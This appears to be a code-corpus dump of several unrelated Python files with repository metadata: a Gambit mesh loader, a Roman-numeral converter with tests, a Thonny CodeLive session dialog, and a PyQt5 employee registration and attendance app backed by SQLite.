bc.feedValue(vdict)
# save to block object.
bc.sern = len(blk.bclist)
bc.blk = blk
blk.bclist.append(bc)
class NeutralIO(FormatIO):
"""
Proxy to gambit neutral file format.
"""
def load(self, stream, bcrej=None):
"""
Load block from stream with BC mapper applied.
@keyword stream: file object or file name to be read.
@type stream: file or str
@keyword bcrej: names of the BC to reject.
@type bcrej: list
@return: the loaded block.
@rtype: solvcon.block.Block
"""
import gzip
# load gambit neutral file.
if isinstance(stream, (bytes, str)):
if stream.endswith('.gz'):
opener = gzip.open
else:
opener = open
stream = opener(stream)
neu = GambitNeutral(stream)
stream.close()
# convert loaded neutral object into block object.
if bcrej:
onlybcnames = list()
for bc in neu.bcs:
if bc.name not in bcrej:
onlybcnames.append(bc.name)
else:
onlybcnames = None
blk = neu.toblock(onlybcnames=onlybcnames)
return blk
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
fname = sys.argv[1]
neu = GambitNeutral(open(fname).read())
sys.stdout.write("Gambit Neutral object: %s" % neu)
if neu.grps or neu.bcs:
sys.stdout.write(", with:\n")
for lst in neu.grps, neu.bcs:
if len(lst) > 0:
for obj in lst:
sys.stdout.write(" %s\n" % obj)
else:
sys.stdout.write("\n")
else:
sys.stdout.write("usage: %s <file name>\n" % sys.argv[0])
| 6,463 | 0 | 446 |
243035aeca0c6a85e79daaadfae60f64bdf4e6f5 | 652 | py | Python | challenges/string/roman_to_integer.py | lukasmartinelli/sharpen | 6f314fc2aa17990ede04055e7c3ac9394a6c12c0 | [
"CC0-1.0"
] | 13 | 2017-04-24T23:27:16.000Z | 2020-05-25T22:41:42.000Z | challenges/string/roman_to_integer.py | lukasmartinelli/sharpen | 6f314fc2aa17990ede04055e7c3ac9394a6c12c0 | [
"CC0-1.0"
] | null | null | null | challenges/string/roman_to_integer.py | lukasmartinelli/sharpen | 6f314fc2aa17990ede04055e7c3ac9394a6c12c0 | [
"CC0-1.0"
] | 2 | 2017-05-27T08:55:28.000Z | 2018-08-11T08:54:51.000Z | symbol_lookup = {
'I': 1,
'V': 5,
'X': 10,
'L': 50,
'C': 100,
'D': 500,
'M': 1000
}
| 21.032258 | 60 | 0.588957 | symbol_lookup = {
'I': 1,
'V': 5,
'X': 10,
'L': 50,
'C': 100,
'D': 500,
'M': 1000
}
def roman_to_int(numeral):
if len(numeral) == 0:
return 0
current_value = symbol_lookup.get(numeral[0], 0)
if len(numeral) > 1:
lookahead = symbol_lookup.get(numeral[1], 0)
if lookahead > current_value:
return roman_to_int(numeral[1:]) - current_value
return current_value + roman_to_int(numeral[1:])
def test_roman_to_int():
assert roman_to_int('XIV') == 14
assert roman_to_int('XX') == 20
assert roman_to_int('MMXIV') == 2014
assert roman_to_int('MCMXC') == 1990
| 492 | 0 | 46 |
8be4eeda0df3b06ac5cfd4b0cf3bbf40b176b899 | 11,091 | py | Python | thonnycontrib/codelive/views/create_session.py | codelive-project/thonny-codelive | 2f88d91d663982b7ca37eca5237ec97d772e56a8 | [
"MIT"
] | 5 | 2021-06-24T16:55:18.000Z | 2022-02-18T11:07:55.000Z | thonnycontrib/codelive/views/create_session.py | codelive-project/codelive | 2f88d91d663982b7ca37eca5237ec97d772e56a8 | [
"MIT"
] | 3 | 2021-04-01T20:40:42.000Z | 2021-10-20T16:53:12.000Z | thonnycontrib/codelive/views/create_session.py | codelive-project/thonny-codelive | 2f88d91d663982b7ca37eca5237ec97d772e56a8 | [
"MIT"
] | null | null | null | import tkinter as tk
from tkinter import ttk
from thonny import get_workbench
from thonnycontrib.codelive.mqtt_connection import generate_topic, topic_exists
from thonnycontrib.codelive.views.hinttext import HintText
from thonnycontrib.codelive.views.textspin import TextSpin
from thonnycontrib.codelive.mqtt_connection import BROKER_URLS
# For testing only!!!!!
if __name__ == "__main__":
if __name__ == "__main__":
root = tk.Tk()
button = tk.Button(root, text="Test", command=start_top)
button.pack(padx=20, pady=20)
root.mainloop()
| 31.87069 | 102 | 0.584167 | import tkinter as tk
from tkinter import ttk
from thonny import get_workbench
from thonnycontrib.codelive.mqtt_connection import generate_topic, topic_exists
from thonnycontrib.codelive.views.hinttext import HintText
from thonnycontrib.codelive.views.textspin import TextSpin
from thonnycontrib.codelive.mqtt_connection import BROKER_URLS
# For testing only!!!!!
if __name__ == "__main__":
class DummyEditor:
def __init__(self, title="untitled", filename=None):
self.title = title
self.filename = filename
def get_title(self):
return self.title
def get_filename(self):
return self.filename
class EditorSelector(ttk.Frame):
def __init__(self, parent, active_editors):
ttk.Frame.__init__(self, parent)
self.active_editors = active_editors
label = ttk.Label(self, text="Please choose the editors you want to share")
container, self.editor_list = self.get_list()
label.pack(side=tk.TOP)
container.pack(side=tk.BOTTOM)
def on_select_all(self):
# on uncheck
if self.check_state.get() == 0:
self.editor_list.selection_clear(0, self.editor_list.size() - 1)
self.check_label.set("Select All")
# on check
else:
self.editor_list.selection_set(0, self.editor_list.size() - 1)
self.check_label.set("Unselect All")
def get_list(self):
container = ttk.Frame(self)
sub_container = ttk.Frame(container)
scrollbar = tk.Scrollbar(sub_container)
list_widget = tk.Listbox(
sub_container,
yscrollcommand=scrollbar.set,
height=7,
width=60,
selectmode=tk.MULTIPLE,
)
scrollbar.configure(command=list_widget.yview)
self.check_state = tk.IntVar()
self.check_label = tk.StringVar()
self.check_label.set("Select All")
self.select_all_check = ttk.Checkbutton(
container,
command=self.on_select_all,
textvariable=self.check_label,
variable=self.check_state,
onvalue=1,
offvalue=0,
)
for item in self.active_editors:
editor = self.active_editors[item]
title = editor.get_title()
filename = editor.get_filename() or "Unsaved"
if len(filename) + len(title) + 3 > 50:
filename = "..." + filename[len(filename) - (len(title) + 6) :]
label = " %s (%s) " % (title, editor.get_filename() or "Unsaved")
list_widget.insert(tk.END, label)
list_widget.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
scrollbar.pack(side=tk.RIGHT, fill=tk.BOTH, expand=True)
sub_container.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
self.select_all_check.pack(side=tk.LEFT)
return container, list_widget
def get_shared_editors(self):
return (self.active_editors[index] for index in self.editor_list.curselection())
def none_selected(self):
return len(self.editor_list.curselection()) == 0
class CreateSessionDialog(tk.Toplevel):
def __init__(self, parent):
tk.Toplevel.__init__(self, parent)
self.protocol("WM_DELETE_WINDOW", self.cancel_callback)
self.title("Create Live Session - Beta")
frame = ttk.Frame(self)
self.data = dict()
# Connection info
Intro = ttk.Label(
frame,
text="Please provide information needed to start your new CodeLive Session.",
)
form_frame = ttk.Frame(frame, width=50)
name_label = ttk.Label(form_frame, text="Your alias")
self.name_input = HintText(form_frame)
session_topic_label = ttk.Label(form_frame, text="Session Topic")
self.topic_input = HintText(form_frame)
broker_label = ttk.Label(form_frame, text="MQTT Broker")
self.broker_input = TextSpin(form_frame, BROKER_URLS, mode="option")
self.broker_input.bind("<<ValueChanged>>", self.broker_changed)
self.auto_gen_topic_state = tk.IntVar()
self.auto_generate_check = ttk.Checkbutton(
form_frame,
text="Auto-generate",
command=self.auto_gen_callback,
variable=self.auto_gen_topic_state,
onvalue=1,
offvalue=0,
)
self.default_broker_val = tk.IntVar()
self.default_broker_val.set(1)
self.default_broker_check = ttk.Checkbutton(
form_frame,
text="Built-In",
command=self.default_broker_callback,
variable=self.default_broker_val,
onvalue=1,
offvalue=0,
)
name_label.grid(row=0, column=0, sticky=tk.E)
self.name_input.grid(row=0, column=1, sticky=tk.W, padx=10, pady=5)
session_topic_label.grid(row=1, column=0, sticky=tk.E)
self.topic_input.grid(row=1, column=1, sticky=tk.W, padx=10, pady=5)
self.auto_generate_check.grid(row=1, column=3, sticky=tk.W)
broker_label.grid(row=2, column=0, sticky=tk.E)
self.broker_input.grid(row=2, column=1, sticky=tk.W + tk.E, padx=10, pady=5)
self.default_broker_check.grid(row=2, column=3, sticky=tk.W)
sep1 = ttk.Separator(frame, orient=tk.HORIZONTAL)
# Shared editors frame
self.editor_selector = EditorSelector(frame, self.get_active_editors(parent))
sep2 = ttk.Separator(frame, orient=tk.HORIZONTAL)
# Bottom Button Frame
button_frame = ttk.Frame(frame)
start_button = tk.Button(
button_frame,
text="Start!",
command=self.start_callback,
fg="green",
width=10,
)
cancel_button = tk.Button(
button_frame,
text="Cancel",
command=self.cancel_callback,
fg="red",
width=10,
)
start_button.pack(side=tk.RIGHT, fill=tk.X, expand=True, padx=5)
cancel_button.pack(side=tk.LEFT, fill=tk.X, expand=True, padx=5)
Intro.pack(expand=True, padx=10, pady=5)
form_frame.pack(side=tk.TOP, expand=False, padx=10, pady=5)
sep1.pack(side=tk.TOP, fill=tk.X, expand=True, padx=20)
self.editor_selector.pack(side=tk.TOP, fill=tk.BOTH)
sep2.pack(side=tk.TOP, fill=tk.X, expand=True, padx=20)
button_frame.pack(side=tk.BOTTOM, padx=10, pady=5)
frame.pack(fill=tk.BOTH, expand=True)
self.center(parent.winfo_geometry())
def center(self, parent_geo):
parent_dim, parent_x, parent_y = parent_geo.split("+")
parent_w, parent_h = [int(l) for l in parent_dim.split("x")]
parent_x = int(parent_x)
parent_y = int(parent_y)
w = 650
h = 350
x = parent_x + (parent_w - w) / 2
y = parent_y + (parent_h - h) / 2
self.geometry("%dx%d+%d+%d" % (w, h, x, y))
def get_active_editors(self, parent):
editors = dict()
# for testing only
if __name__ == "__main__":
editors = {
0: DummyEditor(),
1: DummyEditor("Hello"),
2: DummyEditor(filename="hello path"),
3: DummyEditor("Hello", "Hello's path"),
}
else:
editors = {
index: editor
for (index, editor) in enumerate(
parent.get_editor_notebook().winfo_children()
)
}
return editors
def broker_changed(self, event = None):
self.topic_input.state(tk.NORMAL)
self.auto_gen_topic_state.set(0)
def start_callback(self):
name = self.name_input.val()
topic = self.topic_input.val()
broker = self.broker_input.val()
if (
self.valid_name(name)
and self.valid_connection(topic, broker)
and self.valid_selection()
):
self.data["name"] = name
self.data["topic"] = topic
self.data["broker"] = broker
self.data["shared_editors"] = self.editor_selector.get_shared_editors()
self.destroy()
def cancel_callback(self):
if tk.messagebox.askokcancel(
parent=self,
title="Cancel Session",
message="Are you sure you want to cancel hosting a CodeLive session?",
):
self.data = None
self.destroy()
def default_broker_callback(self):
is_text = self.default_broker_val.get() == 0
self.broker_input.mode("text" if is_text else "option")
self.broker_changed()
def auto_gen_callback(self):
# on uncheck
if self.auto_gen_topic_state.get() == 0:
self.topic_input.state(tk.NORMAL)
# on check
else:
try:
new_topic = generate_topic(self.broker_input.val())
self.topic_input.val(new_topic)
self.topic_input.state(tk.DISABLED)
except TimeoutError as e:
tk.messagebox.showerror(
master=get_workbench(),
title="Timeout error",
message="Rerquest timed out. Please try again."
)
def valid_name(self, s):
if len(s) < 8:
tk.messagebox.showerror(
parent=self,
title="Error",
message="Please provide a name at least 8 characters long.",
)
return False
return True
def valid_connection(self, topic, broker):
if len(topic) < 12:
tk.messagebox.showerror(
parent=self,
title="Error",
message="Please provide a unique topic with more than 12 characters.",
)
return False
if len(broker) < 12:
tk.messagebox.showerror(
parent=self, title="Error", message="Please provide a valid broker."
)
return False
# TODO: replace with topic_exists(s) when topic_exists's logic is complete
if topic_exists(topic, broker):
tk.messagebox.showerror(
parent=self,
title="Error",
message="The topic doesn't exist. Make sure your topic is spelled correctly.",
)
return False
return True
def valid_selection(self):
if self.editor_selector.none_selected():
tk.messagebox.showerror(
parent=self,
title="Error",
message="Please select at least one editor that would be shared during your session.",
)
return False
return True
if __name__ == "__main__":
root = tk.Tk()
def start_top():
top = CreateSessionDialog(root)
root.wait_window(top)
button = tk.Button(root, text="Test", command=start_top)
button.pack(padx=20, pady=20)
root.mainloop()
| 9,884 | 26 | 622 |
601a1d0ae895a74af9e09d812528cbcfd80da52f | 28,305 | py | Python | Registration2.py | Seeeev/Face-recognition-based-attendace-recording-system | 2b8dcc55319ea6e3ed95e2d59a921fc672181116 | [
"Apache-2.0"
] | 1 | 2019-04-25T14:34:57.000Z | 2019-04-25T14:34:57.000Z | Registration2.py | Seeeev/Face-recognition-based-attendace-recording-system | 2b8dcc55319ea6e3ed95e2d59a921fc672181116 | [
"Apache-2.0"
] | null | null | null | Registration2.py | Seeeev/Face-recognition-based-attendace-recording-system | 2b8dcc55319ea6e3ed95e2d59a921fc672181116 | [
"Apache-2.0"
] | null | null | null | from PyQt5.QtWidgets import QPushButton,QApplication, QWidget, QMessageBox
from PyQt5 import QtCore, QtGui, QtWidgets, uic
from PyQt5.QtCore import QTimer
from PyQt5.QtGui import QImage, QPixmap
import cv2
import DTR2
import os, subprocess
import ctypes
import sqlite3
import PySimpleGUI as sg
from PySimpleGUI import SetOptions
import TrainFaces
from easygui import enterbox
## subprocess.Popen(["python", "TrainFaces.py"])
## os._exit
if __name__=='__main__':
import sys
app=QtWidgets.QApplication(sys.argv)
window=Ui_Registration2()
window.show()
sys.exit(app.exec_())
| 54.328215 | 299 | 0.525985 | from PyQt5.QtWidgets import QPushButton,QApplication, QWidget, QMessageBox
from PyQt5 import QtCore, QtGui, QtWidgets, uic
from PyQt5.QtCore import QTimer
from PyQt5.QtGui import QImage, QPixmap
import cv2
import DTR2
import os, subprocess
import ctypes
import sqlite3
import PySimpleGUI as sg
from PySimpleGUI import SetOptions
import TrainFaces
from easygui import enterbox
class Ui_Registration2(QtWidgets.QMainWindow,QPushButton):
def __init__(self):
super(Ui_Registration2,self).__init__()
uic.loadUi('ui files/Registration.ui',self)
self.id_saved = None
# Run the database
self.run_database()
# View data from database
self.view_data()
self.x = []
# Start Webcam -----------------------------------------------
self.startButton.clicked.connect(self.start_cam)
# ------------------------------------------------------------
# Add actions to the menubar
self.actionHome.triggered.connect(self.home)
self.actionDaily_Time_Record.triggered.connect(self.dtr)
# Get the data from the form
self.pushButton_5.clicked.connect(self.get_data)
# Train images
self.trainButton.clicked.connect(self.train_data)
self.clicked = True
# Face Registration (used for recognizing an employee)
self.faceRegister.clicked.connect(self.face_register)
# Below are disabled fields until payrol system is implemented
self.salary = self.lineEdit_12.setEnabled(False)
self.ratio = self.lineEdit_13.setEnabled(False)
self.acc_no = self.lineEdit_14.setEnabled(False)
self.pagibig_no = self.lineEdit_15.setEnabled(False)
self.phil_health_no = self.lineEdit_16.setEnabled(False)
self.gsis_no = self.lineEdit_17.setEnabled(False)
self.salary = self.lineEdit_12.setText("Disabled for now")
self.ratio = self.lineEdit_13.setText("Disabled for now")
self.acc_no = self.lineEdit_14.setText("Disabled for now")
self.pagibig_no = self.lineEdit_15.setText("Disabled for now")
self.phil_health_no = self.lineEdit_16.setText("Disabled for now")
self.gsis_no = self.lineEdit_17.setText("Disabled for now")
# Take a picture of the employee
self.save_idButton.clicked.connect(self.capture_image)
# Search Employee
self.pushButton_10.clicked.connect(self.searchEmployee)
# Delete Employee
self.pushButton_7.clicked.connect(self.deleteEmployee)
# Edit Employee
self.pushButton_8.clicked.connect(self.editEmployee)
# View data from database
self.view_data()
# Lock an employee
self.inactiveButton.clicked.connect(self.lockEmployee)
# List of locked employee
self.inactiveEmployees.clicked.connect(self.inactive_emp_list)
# Close Window
self.closeButton.clicked.connect(self.closeWindow)
def start_cam(self):
self.capture=cv2.VideoCapture(0)
self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT,180)
self.capture.set(cv2.CAP_PROP_FRAME_WIDTH,316)
self.timer = QTimer()
self.timer.timeout.connect(self.update_frame)
self.timer.start(5)
def update_frame(self):
ret,self.image=self.capture.read()
self.image=cv2.flip(self.image,1)
# Display Image Function
self.displayImage(self.image,1)
return self.image
def displayImage(self,img,window=1):
qformat=QImage.Format_Indexed8
if len(img.shape)==3: #[0]=rows, [1]=cols [2]=channels
if img.shape[2]==4:
qformat=QImage.Format_RGBA8888
else:
qformat=QImage.Format_RGB888
outImage=QImage(img,img.shape[1],img.shape[0],img.strides[0],qformat)
#BRG to RGB
outImage=outImage.rgbSwapped()
if window==1:
self.frame_2.setPixmap(QPixmap.fromImage(outImage))
self.frame_2.setScaledContents(True)
def capture_image(self):
conn = sqlite3.connect('db_employees.db')
c = conn.cursor()
c.execute("""SELECT empID FROM tb_emp_info""")
id_list = c.fetchall()
while True:
current_id = enterbox(msg='Please enter your ID.', title=' ', default='', strip=True)
if any(item for item in id_list if current_id in item):
cv2.imwrite("Employee IDs/"+current_id+".png",self.update_frame())
ctypes.windll.user32.MessageBoxW(0, " ID Saved Successfuly", "Success", 0)
break
elif current_id == None:
break
else:
ctypes.windll.user32.MessageBoxW(0, " Invalid ID!", "Error", 0)
def dtr(self):
## subprocess.Popen(["python", "DTR2.py"])
## os._exit
self.ui = DTR2.Ui_DTR2()
self.ui.show()
def home(self):
subprocess.Popen(["python", "main.py"])
os._exit
#self.window=main.DisplayCam()
#self.window.show()
def get_data(self):
conn = sqlite3.connect('db_employees.db')
c = conn.cursor()
c.execute("""SELECT empID from tb_emp_info""")
id_list = c.fetchall()
current_id = self.lineEdit.text()
if self.lineEdit.text().isdigit():
if any(item for item in id_list if current_id in item):
ctypes.windll.user32.MessageBoxW(0, " ID already exists", "Error", 0)
else:
self.empID = self.lineEdit.text()
if len(self.lineEdit_2.text()) == 0:
ctypes.windll.user32.MessageBoxW(0, " Empty field in Last Name", "Error", 0)
elif len(self.lineEdit_3.text()) == 0:
ctypes.windll.user32.MessageBoxW(0, " Empty field in First Name", "Error", 0)
elif len(self.lineEdit_4.text()) == 0:
ctypes.windll.user32.MessageBoxW(0, " Empty field in Middle Name", "Error", 0)
elif len(self.lineEdit_5.text()) == 0:
ctypes.windll.user32.MessageBoxW(0, " Empty field in Address ", "Error", 0)
else:
ctypes.windll.user32.MessageBoxW(0, " Enter a valid Employee ID", "Error", 0)
if (self.lineEdit.text().isdigit() and len(self.lineEdit_2.text())>0 and len(self.lineEdit_3.text())>0 and len(self.lineEdit_4.text()) > 0 and len(self.lineEdit_5.text())>0):
# Get the inputs from the user and store it in variables
self.l_name = self.lineEdit_2.text()
self.f_name= self.lineEdit_3.text()
self.m_name = self.lineEdit_4.text()
self.gender = self.comboBox.currentText()
self.civil_status = self.comboBox_2.currentText()
self.job_desc = self.comboBox_3.currentText()
self.position = self.comboBox_4.currentText()
self.campus = self.comboBox_5.currentText()
self.dept = self.comboBox_6.currentText()
self.address = self.lineEdit_5.text()
self.dependent_type = self.comboBox_7.currentText()
self.soa = self.comboBox_8.currentText()
self.emp_status = self.comboBox_9.currentText()
self.date_hired = self.dateEdit.date().toPyDate()
self.date_of_birth = self.dateEdit_2.date().toPyDate()
# Pull the data from the registration form and it in the database
c.execute("""INSERT INTO tb_emp_info VALUES (:empID, :l_name, :f_name, :m_name, :gender,
:civil_status, :job_desc, :position, :campus, :dept, :address, :dependent_type,
:soa,:emp_status, :date_hired, :date_of_birth)""",
{'empID':self.empID, 'l_name':str(self.l_name), 'f_name':str(self.f_name),
'm_name':str(self.m_name), 'gender':str(self.gender),
'civil_status':str(self.civil_status), 'job_desc':str(self.job_desc),
'position':str(self.position), 'campus':str(self.campus), 'dept':str(self.dept),
'address':str(self.address),'dependent_type':str(self.dependent_type), 'soa':str(self.soa),
'emp_status':str(self.emp_status),'date_hired':str(self.date_hired),
'date_of_birth':str(self.date_of_birth)})
conn.commit()
self.view_data()
# Clear form
c.close()
conn.close()
self.lineEdit.setText(None)
self.lineEdit_2.setText(None)
self.lineEdit_3.setText(None)
self.lineEdit_4.setText(None)
self.lineEdit_5.setText(None)
# Confirmation Message
ctypes.windll.user32.MessageBoxW(0, " You are now registered. Please move to the Face Registration", "Success", 0)
def run_database(self):
# Create the database and insert the data from the form
conn = sqlite3.connect('db_employees.db')
c = conn.cursor()
# Employee's Information Table
c.execute("""CREATE TABLE IF NOT EXISTS tb_emp_info(empID TEXT,
l_name TEXT,
f_name TEXT,
m_name TEXT,
gender TEXT,
civil_status TEXT,
job_desc TEXT,
position TEXT,
campus TEXT,
dept TEXT,
address TEXT,
dependent_type TEXT,
soa TEXT,
emp_status TEXT,
date_hired TEXT,
date_of_birth TEXT)""")
conn.commit()
# Transaction Table
c.execute("""CREATE TABLE IF NOT EXISTS tb_transaction(empID TEXT,
date TEXT,
am_in TEXT,
am_out TEXT,
pm_in TEXT,
pm_out TEXT,
Tardy TEXT,
Undertime TEXT)""")
conn.commit()
# Database for number of lates
c.execute("""CREATE TABLE IF NOT EXISTS tb_lates(empID TEXT,
month TEXT,
day TEXT,
year TEXT,
time TEXT,
note TEXT)""")
# Table for inactive employees
c.execute("""CREATE TABLE IF NOT EXISTS tb_emp_inactive(empID TEXT,
l_name TEXT,
f_name TEXT,
m_name TEXT,
gender TEXT,
civil_status TEXT,
job_desc TEXT,
position TEXT,
campus TEXT,
dept TEXT,
address TEXT,
dependent_type TEXT,
soa TEXT,
emp_status TEXT,
date_hired TEXT,
date_of_birth TEXT)""")
def view_data(self):
conn = sqlite3.connect('db_employees.db')
query = "SELECT empID, l_name, f_name, m_name, gender, civil_status, job_desc, position, campus, dept, address FROM tb_emp_info"
result = conn.execute(query)
self.tableWidget.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableWidget.insertRow(row_number)
for column_number, data in enumerate(row_data):
self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
def train_data(self):
TrainFaces.train()
## subprocess.Popen(["python", "TrainFaces.py"])
## os._exit
def face_register(self):
#FaceRegister.registerFace()
subprocess.Popen(["python", "FaceRegister.py"])
os._exit
def searchEmployee(self):
searchOption = self.comboBox_10.currentText()
searchInput = self.lineEdit_6.text()
conn = sqlite3.connect('db_employees.db')
c = conn.cursor()
if searchOption == 'Employee ID':
c.execute("""SELECT empID, l_name, f_name, m_name, gender, civil_status, job_desc, position, campus, dept, address FROM tb_emp_info WHERE empID=?""",(searchInput,))
result = c.fetchall()
if searchInput != "":
self.tableWidget.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableWidget.insertRow(row_number)
for column_number, data in enumerate(row_data):
self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
else:
self.view_data()
elif SearchOption == 'First Name':
c.execute("""SELECT empID, l_name, f_name, m_name, gender, civil_status, job_desc, position, campus, dept, address FROM tb_emp_info WHERE f_name=?""",(searchInput,))
result = c.fetchall()
if searchInput != "":
self.tableWidget.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableWidget.insertRow(row_number)
for column_number, data in enumerate(row_data):
self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
else:
self.view_data()
elif SearchOption == 'Last Name':
c.execute("""SELECT empID, l_name, f_name, m_name, gender, civil_status, job_desc, position, campus, dept, address FROM tb_emp_info WHERE l_name=?""",(searchInput,))
result = c.fetchall()
if searchInput != "":
self.tableWidget.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableWidget.insertRow(row_number)
for column_number, data in enumerate(row_data):
self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
else:
self.view_data()
elif SearchOption == 'Department':
c.execute("""SELECT empID, l_name, f_name, m_name, gender, civil_status, job_desc, position, campus, dept, address FROM tb_emp_info WHERE dept=?""",(searchInput,))
result = c.fetchall()
if searchInput != "":
self.tableWidget.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableWidget.insertRow(row_number)
for column_number, data in enumerate(row_data):
self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
else:
self.view_data()
elif SearchOption == 'Position':
c.execute("""SELECT empID, l_name, f_name, m_name, gender, civil_status, job_desc, position, campus, dept, address FROM tb_emp_info WHERE position=?""",(searchInput,))
result = c.fetchall()
if searchInput != "":
self.tableWidget.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableWidget.insertRow(row_number)
for column_number, data in enumerate(row_data):
self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
else:
self.view_data()
def deleteEmployee(self):
#data = self.tableWidget.selectedItems()[0].text()
try:
data = self.tableWidget.selectedItems()
empID = data[0].text()
count = self.tableWidget.currentRow()
print(count)
data_ = self.tableWidget.selectedRanges()
for i in range(len(data)):
print(data[i].text())
choice = ctypes.windll.user32.MessageBoxW(0, "Are you sure you want to delete this employee? All his/her data will be lost.", "Confirmation", 1)
if choice == 1:
conn = sqlite3.connect('db_employees.db')
c = conn.cursor()
c.execute("""DELETE FROM tb_emp_info WHERE empID=?""",(empID,))
conn.commit()
ctypes.windll.user32.MessageBoxW(0, " Employee successfuly deleted!", "Success!", 0)
self.view_data()
except IndexError:
ctypes.windll.user32.MessageBoxW(0, " No employee selected!", "Error!", 0)
def editEmployee(self):
# Execute if row is selected in the list of employees
if len(self.tableWidget.selectedItems()) != 0:
data = self.tableWidget.selectedItems()
empID = data[0].text()
conn = sqlite3.connect('db_employees.db')
c = conn.cursor()
empInfo=c.execute("""SELECT * FROM tb_emp_info WHERE empID=?""",(empID,)).fetchall()
empID = empInfo[0][0]
l_name = empInfo[0][1]
f_name = empInfo[0][2]
m_name = empInfo[0][3]
gender = empInfo[0][4]
civil_status = empInfo[0][5]
job_desc = empInfo[0][6]
position = empInfo[0][7]
campus = empInfo[0][8]
dept = empInfo[0][9]
address = empInfo[0][10]
dependent_type = empInfo[0][11]
soa = empInfo[0][12]
emp_status = empInfo[0][13]
date_hired = empInfo[0][14]
date_of_birth = empInfo[0][15]
# Create a GUI for editing an employee
while (True):
SetOptions(background_color='#77A1D3',text_element_background_color='#77A1D3',font='Raleway')
layout = [
[sg.Text('Employee ID', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(empID),
sg.Text('Campus', size=(15, 1), auto_size_text=False, justification='right'),
sg.InputCombo(['Goa Campus', 'Caramoan Campus','Tinambac Campus','San Jose Campus','Lagonoy Campus','Salogon Campus','Sagnay Campus'], size=(38, 3),default_value=campus)],
[sg.Text('Last Name', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(l_name),
sg.Text('Department', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['College of Arts and Sciences', 'College of Education','College of Engineering and Technology','College of Business Management','None'], size=(38, 3), default_value=dept)],
[sg.Text('First Name', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(f_name),
sg.Text('Address', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(address)],
[sg.Text('Middle Name', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(m_name),
sg.Text('Dependent Type', size=(15, 1), auto_size_text=False, justification='right'),
sg.InputCombo(['-------'], size=(38, 3), default_value=dependent_type)],
[sg.Text('Gender', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Male', 'Female'], size=(38, 3), default_value = gender),
sg.Text('Status of Appt.', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Permanent', 'Job Order','Contract of Service','Casual','Temporary'], size=(38, 3),default_value=soa)],
[sg.Text('Civil Status', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Single', 'Married','Divorced','Widowed','Separated'], size=(38, 3),default_value=civil_status),
sg.Text('Employee Status', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Active', 'Inactive'], size=(38, 3),default_value=emp_status)],
[sg.Text('Job Description', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Teaching', 'Non-Teaching'], size=(38, 3), default_value=job_desc),
sg.Text('Date Hired', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(date_hired)],
[sg.Text('Position', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Position-Instructor 1, 2, & 3', 'Assistant-Professor 1& 2','Associate-Professor 1-5','Professor 1-6','University Professor','University President'], size=(38, 3),default_value=position),
sg.Text('Date of Birth', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(date_of_birth)],
[sg.Text(" "*110),sg.Submit(), sg.Cancel()]]
window = sg.Window('Edit Employee', auto_size_text=True, default_element_size=(40, 1)).Layout(layout)
event,values = window.Read()
if event == 'Submit' and '' in values:
window.Close()
ctypes.windll.user32.MessageBoxW(0, "Oops! Don't leave a field empty", "Errror!", 0)
elif event == 'Cancel':
window.Close()
break
elif event == 'Submit' and '' not in values:
c.execute("""UPDATE tb_emp_info SET empID=?,campus=?,l_name=?,dept=?,f_name=?,address=?,m_name=?,
dependent_type=?,gender=?,soa=?,civil_status=?,emp_status=?,job_desc=?,date_hired=?,position=?,
date_of_birth=? WHERE empID=?""",(values[0],values[1],values[2],values[3],values[4],values[5],values[6],values[7],values[8],
values[9],values[10],values[11],values[12],values[13],values[14],values[15],values[0]))
conn.commit()
#['201510381', 'Goa Campus', 'Abante', 'College of Arts and Sciences', 'Seven', 'San Francisco, Lagonoy, Camarines Sur', 'Faura', '-------', 'Male', 'Permanent', 'Single', 'Active', 'Teaching', '2000-01-01', 'Position-Instructor 1, 2, & 3', '2000-01-01']
window.Close()
self.view_data()
ctypes.windll.user32.MessageBoxW(0, 'Employee succesfully edited!', "Success!", 0)
break
else:
ctypes.windll.user32.MessageBoxW(0, "No employee selected!", "Error!", 0)
def lockEmployee(self):
conn = sqlite3.connect('db_employees.db')
c = conn.cursor()
try:
data = self.tableWidget.selectedItems()
empID = data[0].text()
c.execute ("""INSERT INTO tb_emp_inactive SELECT * FROM tb_emp_info WHERE empID =?""",(empID,))
conn.commit()
c.execute ("""DELETE from tb_emp_info WHERE empID=?""",(empID,))
conn.commit()
c.execute("""SELECT * FROM tb_emp_info """)
result = c.fetchall()
self.tableWidget.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableWidget.insertRow(row_number)
for column_number, data in enumerate(row_data):
self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
ctypes.windll.user32.MessageBoxW(0, " Employee successfuly disabled!", "Success", 0)
except IndexError:
ctypes.windll.user32.MessageBoxW(0, " No employee selected!", "Error", 0)
def inactive_emp_list(self):
conn = sqlite3.connect('db_employees.db')
